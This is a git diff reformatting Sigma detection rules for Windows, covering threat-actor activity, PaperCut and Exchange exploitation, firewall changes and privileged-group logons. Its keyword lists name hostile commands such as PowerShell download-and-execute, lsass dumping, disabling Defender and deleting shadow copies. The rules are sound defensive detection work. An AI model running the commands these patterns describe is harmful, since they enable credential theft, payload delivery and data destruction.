process_creation and selection diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml index 9d5be3d39..2ab168f21 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml @@ -1,8 +1,7 @@ title: Lace Tempest Malware Loader Execution id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d status: experimental -description: Detects execution of a specific binary based on filename and hash used - by Lace Tempest to load additional malware as reported by SysAid Team +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe selection_hash: Hashes|contains: SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml index 0e7b682a4..090789553 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml @@ -22,99 +22,98 @@ detection: - aspera - \ruby selection_special_child_powershell_img: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: - CommandLine|contains: http - NewProcessName|endswith: \wget.exe + CommandLine|contains: http + NewProcessName|endswith: \wget.exe selection_child_curl: - CommandLine|contains: http - NewProcessName|endswith: \curl.exe + CommandLine|contains: http + NewProcessName|endswith: \curl.exe selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog - condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*)) + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml index b821112e6..35ef2972b 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml @@ -20,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \ws_tomcatservice.exe filter_main_repadmin: - NewProcessName|endswith: \repadmin.exe + NewProcessName|endswith: \repadmin.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml index 5801564dd..eca187be5 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml @@ -24,105 +24,103 @@ detection: selection_parent_image: ParentProcessName|contains: \java selection_special_child_powershell_img: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: - CommandLine|contains: http - NewProcessName|endswith: \wget.exe + CommandLine|contains: http + NewProcessName|endswith: \wget.exe selection_child_curl: - CommandLine|contains: http - NewProcessName|endswith: \curl.exe + CommandLine|contains: http + NewProcessName|endswith: \curl.exe selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog filter_main: - CommandLine|contains|all: + CommandLine|contains|all: - download.microsoft.com - manageengine.com - msiexec - condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*) and not - filter_main) + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) falsepositives: - Unlikely level: critical diff --git a/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml index 1bc09f4aa..646cdeb78 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml @@ -1,8 +1,7 @@ title: Potential APT Mustang Panda Activity Against Australian Gov id: 7806bb49-f653-48d3-a915-5115c1a85234 status: experimental -description: Detects specific command line execution used by Mustang Panda in a targeted - attack against the Australian government as reported by Lab52 +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 references: - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - copy SolidPDFCreator.dll - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - \Windows\CurrentVersion\Run - SolidPDF diff --git a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml index 92d4bb63d..d7ae05264 100644 --- a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - powershell - -nop -w hidden @@ -26,7 +26,7 @@ detection: - setup.msi - -OutFile selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'msiexec ' - '/i ' - 'setup.msi ' diff --git a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml index 7fea5165e..b5ce9df0e 100644 --- a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml +++ b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml @@ -1,8 +1,7 @@ title: PaperCut MF/NG Potential Exploitation id: 0934ac71-a331-4e98-a034-d49c491fbbcb status: test -description: Detects suspicious child processes of "pc-app.exe". Which could indicate - potential exploitation of PaperCut +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \pc-app.exe - NewProcessName|endswith: + NewProcessName|endswith: - \bash.exe - \calc.exe - \certutil.exe diff --git a/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml index 268c01ba7..48793077e 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: QP's\*(58vaP!tF4 + CommandLine|contains: QP's\*(58vaP!tF4 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml index 5f0cd298d..b48fc1c81 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml @@ -1,8 +1,7 @@ title: New Firewall Rule Added In Windows Firewall Exception List id: cde0a575-7d3d-4a49-9817-b8004a7bf105 status: experimental -description: Detects when a rule has been added to the Windows Firewall exception - list +description: Detects when a rule has been added to the Windows Firewall exception list references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,25 +18,24 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2004 - - 2071 + - 2004 # A rule has been added to the Windows Defender Firewall exception list + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) filter_main_block: Action: 2 filter_main_installations: - - ApplicationPath|startswith: - - C:\Program Files\ - - C:\Program Files (x86)\ - - ModifyingApplication|startswith: C:\Windows\WinSxS\ - - ModifyingApplication: - - C:\Windows\System32\oobe\Setup.exe - - C:\Windows\SysWOW64\msiexec.exe - - C:\Windows\System32\svchost.exe - - C:\Windows\System32\dllhost.exe - - C:\Program Files\Windows Defender\MsMpEng.exe + - ApplicationPath|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - ModifyingApplication|startswith: C:\Windows\WinSxS\ # TiWorker.exe + - ModifyingApplication: + - C:\Windows\System32\oobe\Setup.exe + - C:\Windows\SysWOW64\msiexec.exe + - C:\Windows\System32\svchost.exe + - C:\Windows\System32\dllhost.exe + - C:\Program Files\Windows Defender\MsMpEng.exe filter_optional_msmpeng: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: medium ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml b/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml index 2fef15afb..892edad73 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml @@ -1,11 +1,10 @@ title: New Firewall Exception Rule Added For A Suspicious Folder id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e related: - - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 - type: derived + - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 + type: derived status: experimental -description: Detects the addition of a rule to the Windows Firewall exception list - where the application resides in a suspicious folder +description: Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# @@ -23,8 +22,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2004 - - 2071 + - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10) + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) ApplicationPath|contains: - \AppData\ - \Temp\ @@ -40,8 +39,7 @@ detection: ApplicationPath|startswith: C:\Users\ ApplicationPath|contains: \AppData\Local\Programs\Opera\ ApplicationPath|endswith: \opera.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Any legitimate application that runs from the AppData user directory level: high diff --git a/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml index 4b85d7162..94121f62b 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Modified In The Windows Firewall Exception List id: 5570c4d9-8fdd-4622-965b-403a5a101aa0 status: experimental -description: Detects when a rule has been modified in the Windows firewall exception - list +description: Detects when a rule has been modified in the Windows firewall exception list references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2005 - - 2073 + - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10) + - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files (x86)\ diff --git a/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml b/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml index b4fb134a7..f9ad02f30 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml @@ -1,8 +1,7 @@ title: All Rules Have Been Deleted From The Windows Firewall Configuration id: 79609c82-a488-426e-abcf-9f341a39365d status: experimental -description: Detects when a all the rules have been deleted from the Windows Defender - Firewall configuration +description: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2033 - - 2059 + - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer + - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files\ @@ -30,7 +29,6 @@ detection: filter_optional_msmpeng: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml index 4fe8dec1b..40f5dc95b 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml @@ -1,8 +1,7 @@ title: A Rule Has Been Deleted From The Windows Firewall Exception List id: c187c075-bb3e-4c62-b4fa-beae0ffc211f status: experimental -description: Detects when a single rules or all of the rules have been deleted from - the Windows Defender Firewall +description: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2006 - - 2052 + - 2006 # A rule has been deleted in the Windows Defender Firewall exception list + - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files\ @@ -31,10 +30,9 @@ detection: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe filter_main_null: - ModifyingApplication: null + ModifyingApplication: filter_main_empty: ModifyingApplication: '' - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: medium ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml b/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml index 4a9c37377..101598083 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml @@ -1,8 +1,7 @@ title: The Windows Defender Firewall Service Failed To Load Group Policy id: 7ec15688-fd24-4177-ba43-1a950537ee39 status: test -description: Detects activity when The Windows Defender Firewall service failed to - load Group Policy +description: Detects activity when The Windows Defender Firewall service failed to load Group Policy references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -18,7 +17,7 @@ detection: firewall_as: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: - EventID: 2009 + EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy condition: firewall_as and selection level: low ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml b/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml index 12a183d3e..802f9f5bb 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml @@ -1,8 +1,7 @@ title: Windows Defender Firewall Has Been Reset To Its Default Configuration id: 04b60639-39c0-412a-9fbe-e82499c881a3 status: experimental -description: Detects activity when Windows Defender Firewall has been reset to its - default configuration +description: Detects activity when Windows Defender Firewall has been reset to its default configuration references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2032 - - 2060 + - 2032 # Windows Defender Firewall has been reset to its default configuration + - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11) condition: firewall_as and selection level: low ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml b/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml index ad81ffcb9..2802ecf9a 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml @@ -1,8 +1,7 @@ title: Windows Firewall Settings Have Been Changed id: 00bb5bd5-1379-4fcf-a965-a5b6f7478064 status: experimental -description: Detects activity when the settings of the Windows firewall have been - changed +description: Detects activity when the settings of the Windows firewall have been changed references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,12 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2002 - - 2083 - - 2003 - - 2082 - - 2008 + - 2002 # A Windows Defender Firewall setting has changed. + - 2083 # A Windows Defender Firewall setting has changed. (Windows 11) + - 2003 # A Windows Firewall setting in the profile has changed + - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11) + - 2008 # Windows Firewall Group Policy settings have changed. The new settings have been applied + # - 2010 # Network profile changed on an interface. condition: firewall_as and selection level: low ruletype: Sigma diff --git a/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml b/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml index a0d97ff18..3b94568d0 100644 --- a/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml +++ b/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml @@ -1,8 +1,7 @@ title: Standard User In High Privileged Group id: 7ac407cc-0f48-4328-aede-de1d2e6fef41 status: experimental -description: Detect standard users login that are part of high privileged groups such - as the Administrator group +description: Detect standard users login that are part of high privileged groups such as the Administrator group references: - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection @@ -16,28 +15,25 @@ tags: logsource: product: windows service: lsa-server - definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) - Event Log must be enabled and collected in order to use this rule.' + definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.' detection: lsa_server: Channel: Microsoft-Windows-LSA/Operational selection: EventID: 300 - TargetUserSid|startswith: S-1-5-21- + TargetUserSid|startswith: S-1-5-21- # Standard user SidList|contains: - - S-1-5-32-544 - - -500} - - -518} - - -519} + - S-1-5-32-544 # Local admin + - -500} # Domain admin + - -518} # Schema admin + - -519} # Enterprise admin filter_main_admin: TargetUserSid|endswith: - - '-500' - - '-518' - - '-519' + - '-500' # Domain admin + - '-518' # Schema admin + - '-519' # Enterprise admin condition: lsa_server and (selection and not 1 of filter_main_*) falsepositives: - - Standard domain users who are part of the administrator group. These users shouldn't - have these right. But in the case where it's necessary. They should be filtered - out using the "TargetUserName" field + - Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the "TargetUserName" field level: medium ruletype: Sigma diff --git a/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml index 8ff3c4acd..e568c3cfc 100644 --- a/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml +++ b/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml @@ -1,8 +1,7 @@ title: ProxyLogon MSExchange OabVirtualDirectory id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 status: test -description: Detects specific patterns found after a successful ProxyLogon exploitation - in relation to a Commandlet invocation of Set-OabVirtualDirectory +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory references: - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml index e2fd6bd96..c7a6ff616 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml @@ -1,8 +1,7 @@ title: Certificate Request Export to Exchange Webserver id: b7bc7038-638b-4ffd-880c-292c692209ef status: test -description: Detects a write of an Exchange CSR to an untypical directory or with - aspx name suffix which can be used to place a webshell +description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell references: - https://twitter.com/GossiTheDog/status/1429175908905127938 author: Max Altgelt (Nextron Systems) diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml index 60409737c..0dfbc92a9 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml @@ -1,9 +1,7 @@ title: Mailbox Export to Exchange Webserver id: 516376b4-05cd-4122-bae0-ad7641c38d48 status: experimental -description: Detects a successful export of an Exchange mailbox to untypical directory - or with aspx name suffix which can be used to place a webshell or the needed role - assignment for it +description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html author: Florian 